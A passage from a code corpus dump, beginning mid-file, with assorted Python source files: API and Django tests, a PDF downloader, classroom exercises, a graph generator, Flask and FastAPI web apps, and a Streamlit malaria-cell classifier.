uy\nfrom scripts.handle_mysql import HandleMysql\nfrom scripts.handle_re import HandleRe\nfrom scripts.handle_requests import HandleRequests\n\n\n@ddt\nclass TestAdd(unittest.TestCase):\n eo = HandleExcel('add')\n cases = eo.read_excel()\n\n @classmethod\n def setUpClass(cls):\n cls.hm = HandleMysql()\n cls.hr = HandleRequests()\n cls.hr.common_heads({'X-Lemonban-Media-Type': 'lemonban.v2'})\n\n @data(*cases)\n def test_excel_case(self, obj):\n # 构造url\n register_url = ''.join((uy.open_yaml('api', 'load'), obj.url))\n # 获取请求参数\n data_num = HandleRe.str_regex(obj.data)\n # 发起请求\n res = self.hr.send(url=register_url, data=data_num)\n # 相应内容转换为json格式\n res_data = res.json()\n # Authorization\n if obj.caseId == 2:\n self.hr.one_session.headers.update({'Authorization':'Bearer ' + res_data['data']['token_info']['token']})\n\n try:\n # 多条信息进行断言\n self.assertListEqual([res_data.get('code'), res_data.get('msg')], [obj.expected, obj.msg], msg=f'用例{obj.title}已执行')\n except AssertionError as e:\n self.eo.write_excel(int(obj.caseId) + 1, uy.open_yaml('excel', 'result_col'),\n uy.open_yaml('excel', 'failed'))\n self.eo.write_excel(int(obj.caseId) + 1, uy.open_yaml('excel', 'response_col'), res.text)\n lt.error(e)\n raise e\n else:\n self.eo.write_excel(int(obj.caseId) + 1, uy.open_yaml('excel', 'result_col'),\n uy.open_yaml('excel', 'expected'))\n self.eo.write_excel(int(obj.caseId) + 1, uy.open_yaml('excel', 'response_col'), res.text)\n lt.info(obj.title)\n\n @classmethod\n def tearDownClass(cls):\n cls.hm.close()\n cls.hr.close()\n\nif __name__ == '__main__':\n unittest.main()\n\n\n","sub_path":"cases/test_04_add.py","file_name":"test_04_add.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"403726814","text":"# -*- coding: utf-8 -*-\r\n'''Tp10 : Piles et files.\r\n##############\r\nObjectifs :\r\n-----------\r\n #. Manipulation des files.\r\n #. Manipulation des Piles.\r\n'''\r\n\r\n__author__ = 'A. 
MHAMEDI'\r\n__version__ = '0.1'\r\n\r\n\r\ndef premier_file(file: object) -> object:\r\n '''Retourne le premier element d'une file (FIFO).\r\n\r\n Parameters\r\n ----------\r\n file : File\r\n une file initialisée.\r\n Returns\r\n -------\r\n premier : object\r\n premier élément de la file.\r\n See Also\r\n --------\r\n File.tete()\r\n Notes\r\n -----\r\n on peut créer une version avec une file de type list ou Queue.\r\n '''\r\n premier = file.defiler() # FIFO\r\n return premier\r\n\r\n\r\nif __name__ == '__main__':\r\n import doctest as dt\r\n dt.testmod()\r\n\r\n # from tp11.sdtc import File\r\n from tp11.sdt import File\r\n # Instanciation\r\n file = File()\r\n # pile = Pile()\r\n # Initialisation\r\n for x in range(1, 20, 3):\r\n file.enfiler(x)\r\n # Utilisation\r\n print(premier_file(file))\r\n","sub_path":"tp11/tp10.py","file_name":"tp10.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"486772281","text":"from django.core.management import call_command\nfrom django.test import TestCase, Client\nfrom django.conf import settings\n\n\nclass TestViews(TestCase):\n def setUp(self):\n args = []\n opts = {'dumpfile': settings.MEDIA_ROOT + 'test_db_dump.xml', 'verbosity': 0}\n cmd = 'migrate_db'\n call_command(cmd, *args, **opts)\n\n self.client = Client()\n\n def test_index(self):\n response = self.client.get('/share_data_gbif/')\n self.assertEqual(200, response.status_code)\n\n def test_dump_data_error(self):\n response = self.client.get('/share_data_gbif/dump_data/')\n result = response.content.decode('utf-8')\n expected = '{\"result\": \"error\"}'\n self.assertEqual(expected, result)\n\n def test_dump_data_count_data(self):\n response = self.client.get('/share_data_gbif/dump_data/',\n {'request': 'count_data'})\n result = response.content.decode('utf-8')\n expected = '\"count\": 10'\n self.assertTrue(expected in result)\n\n def test_dump_data_make_file(self):\n response = self.client.get('/share_data_gbif/dump_data/',\n {'request': 'make_file'})\n result = response.content.decode('utf-8')\n expected = 'CP100-15,,,Nymphalidae,,Melitaeini,Melitaeina'\n self.assertTrue(expected in result)\n","sub_path":"gbif/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"641439533","text":"import requests\nimport os\nfrom lxml.etree import ElementTree, HTMLParser\nimport io\n\n\ndef download_to(path, url_to_download_from):\n # download chosen file from the url to the path\n # folder in format \"./folder1/folder2/final_folder/\"\n # url in format: \"https://doc.lagout.org/science/0_Computer%20Science/2_Algorithms/Genetic%20Programming.pdf\"\n file_name, file_format = get_file_name_and_format(url_to_download_from)\n response_object = requests.get(url_to_download_from)\n\n if path[-1] != \"/\":\n path = path + \"/\"\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n with open(path + file_name + \".\" + file_format, \"wb\") as file:\n file.write(response_object.content)\n file.close()\n return print(\"download: \", file_name + \".\" + file_format)\n\n\ndef get_file_name_and_format(file_url):\n file_name_and_format = file_url.split(\"/\")[-1]\n splitted_by_dot = file_name_and_format.split(\".\")\n file_name, file_format = \"\".join(splitted_by_dot[:-1]), splitted_by_dot[-1]\n return file_name, file_format\n\n\ndef download_all_to(path, url):\n # download all 
files from the url and save to the path\n response_object = requests.get(url)\n url_file_list = lxml_get_files(response_object)\n\n if path[-1] != \"/\":\n path = path + \"/\"\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n if not url.endswith(\"/\"):\n url = url + \"/\"\n\n for file in url_file_list:\n download_to(path, url + file)\n\ndef lxml_get_files(page_response):\n tree = ElementTree(file=io.BytesIO(page_response.content), parser=HTMLParser()).getroot()\n all_a_elements = tree.cssselect('pre a')\n dir_and_files_list = [i.get(\"href\") for i in all_a_elements]\n\n file_list = [i for i in dir_and_files_list if not i.endswith(\"/\")]\n return file_list\n\n\nif __name__ == '__main__':\n dir = \"./foo/\"\n url = \"https://doc.lagout.org/science/0_Computer%20Science/2_Algorithms/Genetic%20Programming.pdf\"\n # download_to(dir, url)\n folder_url = \"https://doc.lagout.org/science/0_Computer%20Science/2_Algorithms/\"\n download_all_to(dir, folder_url)","sub_path":"common-data/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"491920107","text":"import time\n\ndef main():\n # Find the first 47 Fibonacci numbers\n INDEX = 47\n numbers = INDEX * [0]\n numbers[0] = 0\n numbers[1] = 1\n for i in range(2, INDEX):\n numbers[i] = numbers[i - 1] + numbers[i - 2]\n\n print(\"\\t\\t\\t40\\t41\\t42\\t43\\t44\\t45\")\n print(\"-------------------------------------------------------------\")\n print(\"Listing 16.2 GCD1\")\n\n executionTime = 6 * [0]\n\n for i in range(40, 45 + 1):\n startTime = time.time()\n gcd1(numbers[i], numbers[i + 1])\n executionTime[i - 40] = time.time() - startTime\n\n for i in range(5 + 1):\n print(\"\\t\" + str(executionTime[i]))\n\n print(\"\\nListing 16.3 GCD2\")\n\n for i in range(40, 45 + 1):\n startTime = time.time()\n gcd2(numbers[i], numbers[i + 1])\n executionTime[i - 40] = time.time() - startTime\n\n for i in range(0, 5 + 1):\n print(\"\\t\" + str(executionTime[i]))\n\n# Find gcd for integers m and n \ndef gcd1(m, n):\n gcd = 1\n \n if m % n == 0:\n return n\n \n for k in range(int(n / 2), 0, -1):\n if m % k == 0 and n % k == 0:\n gcd = k\n break\n \n return gcd\n\n# Find gcd for integers m and n \ndef gcd2(m, n):\n if m % n == 0:\n return n\n else:\n return gcd2(n, m % n)\n \nmain()","sub_path":"evennumberedexercise/Exercise16_6.py","file_name":"Exercise16_6.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"179171900","text":"import random\nimport os\nimport datetime\nimport sys\nimport yaml\nimport json\nimport pickle\n\nSource_dir=os.getcwd()\n#random_system=random.SystemRandom()\nrandom_system=random\n\ndef convert_bytes(num):\n \"\"\"\n convert num to idiomatic byte unit\n :param num: the input number.\n :type num:int\n :return: str\n \"\"\"\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:\n if num < 1024.0:\n return \"%3.1f %s\" % (num, x)\n num /= 1024.0\ndef filesize(fileaddr):\n '''\n This function calculates output file size\n :param fileaddr: file addresses\n :type fileaddr:str\n :return: file size for print as string\n '''\n file_info=os.stat(fileaddr)\n file_size= file_info.st_size\n print(\"Graph File Size : \"+convert_bytes(file_size))\n\ndef logger(vertices_number,edge_number,file_name,elapsed_time):\n '''\n This function saves generated graphs log\n :param vertices_number: number of vertices\n :type 
vertices_number:int\n :param edge_number: Number of edges\n :type edge_number:int;\n :param file_name: File Name\n :type file_name:str\n :param elapsed_time: Elapsed Time\n :type elapsed_time : str\n :return: None\n '''\n try:\n file = open(\"logfile.log\", \"a\")\n file.write(str(datetime.datetime.now())+\"\\n\")\n file.write(\"Filename : \"+file_name+\"\\n\")\n file.write(\"Vertices : \"+str(vertices_number)+\"\\n\")\n file.write(\"Edges : \"+str(edge_number)+\"\\n\")\n file.write(\"Elapsed Time : \" + str(elapsed_time) + \"\\n\")\n file.write(\"-------------------------------\\n\")\n file.close()\n except Exception:\n print(\"[Error] Logger Faild!\")\n\ndef zero_insert(input_string):\n '''\n This function get a string as input if input is one digit add a zero\n :param input_string: input digit az string\n :type input_string:str\n :return: modified output as str\n >>> zero_insert(\"22\")\n >>> '22'\n '''\n if len(input_string)==1:\n return \"0\"+input_string\n return input_string\n\ndef time_convert(input_string):\n '''\n This function convert input_string from sec to DD,HH,MM,SS Format\n :param input_string: input time string in sec\n :type input_string:str\n :return: converted time as string\n '''\n input_sec=float(input_string)\n input_minute=input_sec//60\n input_sec=int(input_sec-input_minute*60)\n input_hour=input_minute//60\n input_minute=int(input_minute-input_hour*60)\n input_day=int(input_hour//24)\n input_hour=int(input_hour-input_day*24)\n return zero_insert(str(input_day))+\" days, \"+zero_insert(str(input_hour))+\" hour, \"+zero_insert(str(input_minute))+\" minutes, \"+zero_insert(str(input_sec))+\" seconds\"\n\n\ndef get_input(input_func=input):\n '''\n This function get input from user and return as dictionary\n :return: inputs as dictionary\n '''\n try:\n file_name=input_func(\"File Name : \")\n if file_name+\".gr\" in os.listdir():\n raise Exception(\"There is file with this name\")\n vertices=int(input_func(\"Vertices Number : \"))\n max_weight=int(input_func(\"Max Weight : \"))\n min_weight = int(input_func(\"Min Weight : \"))\n min_edge=int(input_func(\"Min Edge Number :\"))\n min_edge=max(0,min_edge)\n max_edge=int(input_func(\"Max Edge Number :\"))\n max_edge=min(max_edge,vertices)\n sign_flag=int(input_func(\"Signed[1] or Unsigned[2]\"))\n output_format=int(input_func(\"Graph Format : \\nDIMACS(.gr)[1] | JSON(.json)[2] | CSV(.csv)[3] | YAML(.yaml)[4]\\n| WEL(.wel)[5] | ASP(.lp)[6] | Pickle(.p)[7] | UCINET DL Format(.dl)[8] | TGF(.tgf)[9]\"))\n if sign_flag not in [1,2]:\n sign_flag=2\n if output_format not in list(range(1,10)):\n output_format=1\n return {\"file_name\":file_name,\"vertices\":vertices,\"max_weight\":max_weight,\"min_weight\":min_weight,\"min_edge\":min_edge,\"max_edge\":max_edge,\"sign\":sign_flag,\"output_format\":output_format}\n except Exception:\n print(\"[Error] Bad Input!\")\n sys.exit()\n\ndef sign_gen():\n '''\n This function return random sign\n :return: 1 or -1\n '''\n flag=random_system.randint(0,1)\n if flag==0:\n return 1\n else:\n return -1\ndef branch_gen(random_edge,vertices_number,min_range,max_range,sign):\n '''\n This function generate branch and weight vector of each vertex\n :param random_edge: number of vertex edges\n :type random_edge:int\n :param vertices_number: number of vertices\n :type vertices_number:int\n :param min_range: weight min range\n :type min_range:int\n :param max_range: weight max range\n :type max_range:int\n :return: branch and weight list\n '''\n index = 0\n branch_list = []\n weight_list=[]\n while 
(index < random_edge):\n random_tail = random_system.randint(1, vertices_number + 1)\n if sign==2:\n random_weight=random_system.randint(min_range,max_range)\n else:\n random_weight = sign_gen() * random_system.randint(min_range, max_range)\n if random_tail not in branch_list:\n branch_list.append(random_tail)\n weight_list.append(random_weight)\n index += 1\n return [branch_list,weight_list]\ndef edge_gen(vertices_number,min_range,max_range,min_edge,max_edge,sign):\n '''\n This function generate each vertex connection number\n :param vertices_number: number of vertices\n :type vertices_number:int\n :param min_range: weight min_range\n :type min_range:int\n :param max_range: weight max_range\n :type max_range:int\n :return: list of 2 dictionary\n '''\n temp=0\n vertices_id=list(range(1,vertices_number+1))\n vertices_edge=[]\n weight_list=[]\n i=0\n while(i ListNode:\r\n if not lists:\r\n return None\r\n counter = itertools.count()\r\n pq = []\r\n head = cur = ListNode(0)\r\n for i in lists:\r\n if i:\r\n count = next(counter)\r\n heapq.heappush(pq, (i.val, count, i))\r\n while pq:\r\n val, _, node = heapq.heappop(pq)\r\n new = ListNode(val)\r\n cur.next = new\r\n cur = cur.next\r\n node = node.next\r\n count = next(counter)\r\n if node:\r\n heapq.heappush(pq, (node.val, count, node))\r\n return head.next","sub_path":"codes/AndrewSun/0023.py","file_name":"0023.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"581491786","text":"from .errors import PureModule; PureModule\nfrom itertools import chain\n\n_ALPHA = tuple(map(chr, range(ord('a'), ord('z') + 1)))\n\ndef aaa(n):\n r'''\n aaa(0) == 'a', 'b',..., 'z'\n aaa(1) == 'aa', 'ab',...'az', 'ba', 'bb',..., 'zz'\n aaa(2) == 'aaa', 'aab',...'aaz', 'aba', 'abb',..., 'zzz'\n '''\n if n == 0:\n return _ALPHA\n return (l + r for l in _ALPHA for r in aaa(n - 1))\n\ndef aaaa(n):\n '''chain(aaa(0), aaa(1), aaa(2),..., aaa(n - 1)) == (aaaa(n))'''\n return chain(*(aaa(i) for i in range(n)))\n# aaaa = lambda n: chain(*(aaa(i) for i in range(n)))\n","sub_path":"x19290/aaa.py","file_name":"aaa.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"238083542","text":"class Solution(object):\n def matrixReshape(self, nums, r, c):\n if len(nums) * len(nums[0]) != r * c:\n return nums\n res, sub = [], []\n for row in nums:\n for num in row:\n sub.append(num)\n if len(sub) == c:\n res.append(sub)\n sub = []\n return res\n","sub_path":"algorithms/ReshapeTheMatrix/ReshapeTheMatrix.py","file_name":"ReshapeTheMatrix.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"165249783","text":"from flask import Flask, current_app, request, jsonify\nimport io\nimport json\nimport model\nimport base64\nfrom PIL import Image\nimport numpy as np\nimport logging\n\napp = Flask(__name__)\nlogging.basicConfig(level=logging.DEBUG)\n\n@app.route('/', methods=['POST'])\ndef style_transform():\n data = {}\n try:\n data = request.get_json()['data']\n style = request.get_json()['style']\n except KeyError:\n return jsonify(status_code='400', msg='Bad Request'), 400\n\n current_app.logger.info('Style: %s', style)\n \n data_dec = base64.b64decode(data) #Decode a Base64 encoded string.\n img_in = io.BytesIO(data_dec)\n \n #style = 'la_muse.ckpt'\n style = \"Model/\"+ style;\n \n img_out = 
model.rundeeplearning(img_in, style)\n\n \n data_out = base64.b64encode(img_out.getvalue()).decode() #encode a Base64 encoded string. \n #logging.info(data_out)\n \n return json.dumps({'data': data_out})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n","sub_path":"Docker-transform-service/transform-service/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"144633709","text":"import copy\n\nimport pytest\n\nfrom template_matching import IntializeData\nfrom template_matching.run.single_process import TemplateMatching\nfrom template_matching.errors import TemplateMatchingException\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef data():\n n_templates = 10\n data = IntializeData(n_templates)\n return data\n\n\n@pytest.fixture(scope='function')\ndef template_matching(data):\n templates_data = data.templates_data\n image_path = data.image_path\n\n template_matching = TemplateMatching(templates_data, image_path)\n yield template_matching\n\n del template_matching\n return\n\n\n# @pytest.mark.skip()\ndef test_1(data, template_matching):\n # set_templates(): OK\n # run(): OK\n n_templates = data.n_templates\n templates_data = data.templates_data\n image_path = data.image_path\n\n template_matching.set_templates(templates_data)\n results = template_matching.run(image_path)\n assert n_templates == len(results)\n return\n\n\n# @pytest.mark.skip()\ndef test_error_1(data, template_matching):\n # set_templates(): NG\n # run(): NG\n # set_templates(): OK\n # run(): OK\n n_templates = data.n_templates\n templates_data = data.templates_data\n image_path = data.image_path\n\n wrong_templates_data = copy.deepcopy(templates_data)\n wrong_templates_data[0] = {}\n with pytest.raises(Exception):\n template_matching.set_templates(wrong_templates_data)\n\n with pytest.raises(Exception):\n results = template_matching.run(image_path)\n\n template_matching.set_templates(templates_data)\n\n results = template_matching.run(image_path)\n assert n_templates == len(results)\n return\n\n\n# @pytest.mark.skip()\ndef test_error_2(data, template_matching):\n # set_templates(): OK\n # run(): NG\n # run(): OK\n n_templates = data.n_templates\n templates_data = data.templates_data\n image_path = data.image_path\n\n template_matching.set_templates(templates_data)\n\n wrong_image_path = 'wrong_path/to/image.jpg'\n with pytest.raises(Exception):\n results = template_matching.run(wrong_image_path)\n import time\n time.sleep(10)\n\n results = template_matching.run(image_path)\n assert n_templates == len(results)\n return\n","sub_path":"server/tests/test_run/test_single_process.py","file_name":"test_single_process.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103617801","text":"from fastapi import APIRouter, Depends\nfrom fastapi.encoders import jsonable_encoder\nfrom typing import List\nfrom schemas.librarian import LibrarianInfo\nfrom schemas.student import StudentInfo\nfrom config.db import db\nfrom config.librarian_auth_config import get_current_active_user as get_current_librarian_user\nfrom config.student_auth_config import get_current_active_user as get_current_student_user\nfrom schemas.book import Book\n\nrouter = APIRouter()\ncollection = db.books\n\n\n@router.post('/book_entry', response_model=Book, response_description=\"New entry book record\")\nasync 
def new_book_entry(book: Book, current_user: LibrarianInfo = Depends(get_current_librarian_user)):\n new_entry = await collection.insert_one(jsonable_encoder(book))\n document = await collection.find_one({\"_id\": new_entry.inserted_id})\n return document\n\n\n@router.delete('/delete_a_book/{id}', response_description=\"Delete a book record\")\nasync def delete_a_book(id: str, current_user: StudentInfo = Depends(get_current_librarian_user)):\n search_book = await collection.find_one({\"_id\": id})\n if search_book:\n await collection.delete_one({\"_id\": id})\n return \"Successfully deleted a book record\"\n else:\n return f\"There is no book with this id {id}\"\n\n\n\n@router.get('/books&u=s', response_model=List[Book], response_description=\"Get all books\")\nasync def get_all_books(current_user: StudentInfo = Depends(get_current_student_user)):\n document = await collection.find().to_list(1000)\n return document\n\n\n@router.get('/books&u=l', response_model=List[Book], response_description=\"Get all books\")\nasync def get_all_books(current_user: LibrarianInfo = Depends(get_current_librarian_user)):\n document = await collection.find().to_list(1000)\n return document\n\n\n@router.get('/book/{id}', response_model=Book, response_description=\"Get a book\")\nasync def get_a_book(id: str, current_user: LibrarianInfo = Depends(get_current_librarian_user)):\n document = await collection.find_one({\"_id\": id})\n return document","sub_path":"backend/routes/book_info.py","file_name":"book_info.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"215473718","text":"import streamlit as st\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\nimport cv2 as cv\r\nimport keras\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nfrom models.gradcam import GradCAM\r\nimport imutils\r\n\r\nimport tensorflow as tf\r\ntf.compat.v1.enable_eager_execution()\r\n\r\nIMG_SIZE = 50\r\nCATEGORIES = [\"Parasitized\", \"Uninfected\"]\r\n\r\n#######################################################################################\r\n\r\ndef teachable_machine_classification(image_array, model_file):\r\n # Load the model\r\n model = keras.models.load_model(model_file)\r\n\r\n # Create the array of the right shape to feed into the keras model\r\n img_arr = cv.resize(image_array, (IMG_SIZE, IMG_SIZE))\r\n new_arr = img_arr.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\r\n # normalize the array\r\n new_arr = new_arr/255.0\r\n\r\n # run the inference\r\n pred = model.predict_classes(new_arr)\r\n return pred\r\n\r\n######################################################################################################\r\n\r\nst.title(\"Malaria parasite detection\")\r\nst.header(\"Malaria infected cell Classification Example\")\r\nst.text(\"Upload a cell Image for image classification as infected/Parasitized or uninfected\")\r\n\r\nuploaded_file = st.file_uploader(\"Choose a cell ...\", type=\"png\")\r\nif uploaded_file is not None:\r\n image = Image.open(uploaded_file)\r\n st.image(image, caption='Uploaded cell.', use_column_width=True)\r\n st.write(\"\")\r\n st.write(\"Classifying...\")\r\n st.write(uploaded_file.name)\r\n \r\n image1 = image.resize((50,50))\r\n gray = image1.convert(\"L\")\r\n img_array = np.array(gray)\r\n\r\n\r\n label = teachable_machine_classification(img_array, \"models/64_CNN.model\")\r\n\r\n if label > 0.50:\r\n st.write(\"The cell is Infected with malaria\")\r\n\r\n model = 
keras.models.load_model(\"models/64_CNN.model\")\r\n image2 = image.resize((100,100))\r\n\r\n doc = keras.preprocessing.image.img_to_array(gray) # -> numpy array\r\n doc = np.expand_dims(doc, axis=0)\r\n\r\n doc = doc/255.0\r\n\r\n cam = GradCAM(model, 0, \"conv2d_2\")\r\n heatmap = cam.compute_heatmap(doc)\r\n \r\n # resize the resulting heatmap to the original input image dimensions\r\n # and then overlay heatmap on top of the image\r\n heatmap = cv.resize(heatmap, (100,100))\r\n\r\n (heatmap, output) = cam.overlay_heatmap(heatmap, np.array(image2) , alpha=0.5)\r\n\r\n # # draw the predicted label on the output image\r\n\r\n # cv2.rectangle(output, (0, 0), (340, 40), (0, 0, 0), -1)\r\n # cv2.putText(output, \"label\", (10, 25), cv2.FONT_HERSHEY_SIMPLEX,``\r\n # \t0.8, (255, 255, 255), 2)\r\n # display the original image and resulting heatmap and output image\r\n # to our screen\r\n output = np.hstack([image2, output])\r\n output = imutils.resize(output, height=500, width=1000)\r\n st.image(output, caption=\"Hotspots that influence the prediction\")\r\n \r\n else:\r\n st.write(\"The cell is not infected with malaria\")\r\n\r\n\r\n\r\n\r\n####################################################################################\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n ","sub_path":"Malaria Cell Classifier/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"62600671","text":"# -*- coding: utf-8 -*-\nimport time # used for generating mysql timestamps\nimport gc # garbage collector\n# used for generating a sitemap for google analytics\nfrom datetime import datetime, timedelta\n\n\"\"\" Flask imports \"\"\"\nfrom flask import Flask, render_template, flash, request, url_for, redirect, \\\n session, make_response\n\n\"\"\" Security imports \"\"\"\n# allows funtion wrapping used for protecting elevated rights restricted content\nfrom functools import wraps\n\n\"\"\" Project modules \"\"\"\n# WTForm classes\nfrom user_forms import RegistrationForm, ProfileForm\n# MySQL database management module, manages queries\nfrom db_manager import auth_user, set_uid, update_profile, db_search, register_user\n# dynamic dictionary module for link/url/content management\nfrom content_manager import Content\n\nfrom jaden_tweets import MakeTweet\n\n\"\"\" Flask Config \"\"\"\n# instatiate/declare instance of the Flask app class\napp = Flask(__name__)\n# server path to upload folder, not used currently\napp.config['UPLOAD_FOLDER'] = '/static/uploads/'\n# file extension whitelist for user uploads, not used currently\napp.config['ALLOWED_EXTENSIONS'] = set(['png', 'jpg', 'jpeg', 'gif'])\n\n\"\"\" Global Variables \"\"\"\n# populate reference dictionary from content manager {topic:[[url,description]]}\nREF_DICT = Content()\n\n\n## ----------------- TO DO ---------------- ##\n## -> set up session manager module ##\n\n\n# returns passed in attribute of active user from session/sqldb\ndef get_user(attribute):\n try:\n uid = session['uid']\n username = session['username']\n if attribute == 'uid':\n return uid\n elif attribute == 'username':\n return username\n else:\n return db_search(str(uid), attribute)\n except:\n return ''\n\n\n# @app.route('url')\n# @login_required\n# def page...\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n flash('You need to login first')\n return redirect(url_for('loginpage'))\n return 
wrap\n\n\"\"\"----------------------------------\"\"\"\n\"\"\" Define site navigation templates \"\"\"\n\"\"\"----------------------------------\"\"\"\n\n\n@app.route('/', methods=['GET', 'POST']) # home directory\ndef homepage():\n try: # return the homepage template\n return render_template('homepage.html',\n USERNAME=get_user('username'))\n except Exception as ERROR: # Server Exception template with error message\n return render_template('500.html', ERROR=ERROR)\n\n\n# Realtime Overview Google analytics for this page\n@app.route('/jaden-tweets/') # https://goo.gl/wHJwST\ndef jadentweets():\n try:\n return render_template('jaden_tweets.html',\n USERNAME=get_user('username'),\n TWEET_BODY=MakeTweet(),\n TIMESTAMP=time.strftime('%-I:%M %p - %d %b %y'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/dashboard/') # main landing for site nav\n@login_required\ndef dashboard():\n try:\n return render_template('dashboard.html',\n USERNAME=get_user('username'),\n UID=get_user('uid'),\n USERDATE=get_user('user_date'),\n FIRSTNAME=get_user('first_name'),\n LASTNAME=get_user('last_name'),\n NICKNAME=get_user('nickname'),\n COUNTRY=get_user('country'),\n STATE=get_user('state'),\n CITY=get_user('city'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/projects/')\ndef projectpage():\n try:\n return render_template('projects.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/reference/')\ndef referencepage():\n try:\n return render_template('reference.html',\n REF_DICT=REF_DICT,\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/support-donate/')\ndef donatepage():\n try:\n return render_template('donate.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/about/technology/')\ndef technologypage():\n try:\n return render_template('technology.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/contact/')\ndef contactpage():\n try:\n return render_template('contact.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/about/tos/')\ndef termsofservicepage():\n try:\n return render_template('tos.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/about/privacy-policy/')\ndef privacypage():\n try:\n return render_template('privacy.html',\n USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n\"\"\"-------------------------------------------------------\"\"\"\n\"\"\" Define site authentication and registration functions \"\"\"\n\"\"\" with unique page templates \"\"\"\n\"\"\"-------------------------------------------------------\"\"\"\n\n\n@app.route('/edit-profile/', methods=['GET', 'POST'])\n@login_required\ndef editprofilepage():\n ERROR = ''\n form = ProfileForm()\n try:\n form = ProfileForm(request.form)\n if request.method == 'POST' and form.validate():\n # must be string for sql query\n # perform mysql query new_record/overwrite action\n update_profile(str(session['uid']), form)\n # flash success message to user\n flash(\"Your profile has been 
updated.\")\n return redirect(url_for('dashboard'))\n return render_template('edit_profile.html',\n USERNAME=get_user('username'),\n form=form)\n except Exception as ERROR:\n #flash(str(ERROR)) # debug output\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef loginpage():\n ERROR = ''\n try:\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n # authenticate user input\n if auth_user(username, password):\n # add logged in status & user info to session cookie\n session['logged_in'] = True\n session['username'] = username\n # this probably needs to be a string to fix SELECT *\n session['uid'] = set_uid(username)\n # show user success notification\n flash(\"You are now logged in.\")\n return redirect(url_for('dashboard'))\n else:\n ERROR = 'Invalid credentials, try again.'\n return render_template('login.html', ERROR=ERROR)\n except Exception as ERROR:\n return render_template('login.html', ERROR=ERROR)\n\n\n@app.route('/register/', methods=['GET', 'POST'])\ndef registerpage():\n form = RegistrationForm()\n try:\n # create instance of the Regisration form for the user\n form = RegistrationForm(request.form)\n # if the form is submitted and all form requirements are met\n if request.method == 'POST' and form.validate():\n new_user = register_user(form)\n username = form.username.data\n if new_user != 'success':\n # error message to user\n flash(new_user)\n # return to registration page\n return render_template('register.html', form=form)\n else:\n flash(new_user)\n # set session cookie values for user\n session['logged_in'] = True\n session['username'] = username\n session['uid'] = set_uid(username)\n # return logged in user to dashboard\n return redirect(url_for('dashboard'))\n return render_template('register.html', form=form)\n # Debugging error handling\n except Exception as ERROR:\n #flash(str(ERROR)) # debug output\n return render_template('register.html', ERROR=ERROR, form=form)\n\n\n@app.route('/logout/')\n@login_required\ndef logoutpage():\n session.clear()\n flash('You have logged out.')\n gc.collect()\n return redirect(url_for('homepage'))\n\n\n\"\"\"----------------\"\"\"\n\"\"\" Error Handling \"\"\"\n\"\"\"----------------\"\"\"\n\n\n@app.errorhandler(404)\ndef page_not_found(ERROR):\n try:\n return render_template('404.html', USERNAME=get_user('username'))\n except Exception as ERROR:\n return render_template('500.html', ERROR=ERROR)\n\n\n@app.errorhandler(405)\ndef method_not_allowed(ERROR):\n try:\n return render_template('405.html', USERNAME=get_user('username'))\n except Exception as ERROR:\n return 